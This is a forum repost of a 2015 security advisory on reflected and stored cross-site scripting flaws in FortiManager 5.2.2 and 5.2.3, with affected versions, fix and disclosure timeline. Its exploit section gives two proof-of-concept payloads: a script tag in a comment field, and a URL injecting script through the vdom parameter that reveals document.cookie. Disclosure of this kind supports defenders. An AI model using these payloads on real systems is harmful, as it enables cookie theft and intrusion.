sarmulita Posted September 28, 2015 Report Posted September 28, 2015 [+] Credits: hyp3rlinx[+] Website: hyp3rlinx.altervista.org[+] Source:http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txtVendor:================================www.fortinet.comProduct:================================FortiManager v5.2.2FortiManager is a centralized security management appliance that allows youtocentrally manage any number of Fortinet Network Security devices.Vulnerability Type:===================Multiple Cross Site Scripting ( XSS ) in FortiManager GUIhttp://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-guiCVE Reference:==============PendingVulnerability Details:=====================The Graphical User Interface (GUI) of FortiManager v5.2.2 isvulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities.2 potential XSS vectors were identified:* XSS vulnerability in SOMVpnSSLPortalDialog.* XSS vulnerability in FGDMngUpdHistory.The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable toone reflected XSS vulnerability and one stored XSS vulnerability.2 potential XSS vectors were identified:* XSS vulnerability in sharedjobmanager.* XSS vulnerability in SOMServiceObjDialog.Affected ProductsXSS items 1-2: FortiManager v5.2.2 or earlier.XSS items 3-4: FortiManager v5.2.3 or earlier.Solutions:===========No workarounds are currently available.Update to FortiManager v5.2.4.Exploit code(s):===============1- Persistent:https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50<div class="ui-comments-div"><textarea id="_comp_15" name="_comp_15"class="ui-comments-text" cols="58" maxlength="255" maxnum="255" placeholder="Write a comment"rows="1"><script>alert(666)</script></textarea><labelclass="ui-comments-remaining">2- Reflectedhttps://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E<https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]%5Cn%5Cn%27%2bdocument.cookie%29%3C/script%3E>Disclosure Timeline:=========================================================Vendor Notification: August 4, 2015September 24, 2015 : Public DisclosureExploitation Technique:=======================Remote & LocalSeverity Level:=========================================================Medium (3)Description:==========================================================Request Method(s): [+] GETVulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlierVulnerable Parameter(s): [+] vdom, textarea fieldAffected Area(s): [+] sharedobjmanager, SOMServiceObjDialog===========================================================[+] DisclaimerPermission is hereby granted for the redistribution of this advisory,provided that it is not altered except by reformatting it, and that duecredit is given. Permission is explicitly given for insertion invulnerability databases and similar, provided that due credit is given tothe author.The author is not responsible for any misuse of the information containedherein and prohibits any malicious use of all security related informationor exploits by the author or elsewhere.by hyp3rlinxsource Quote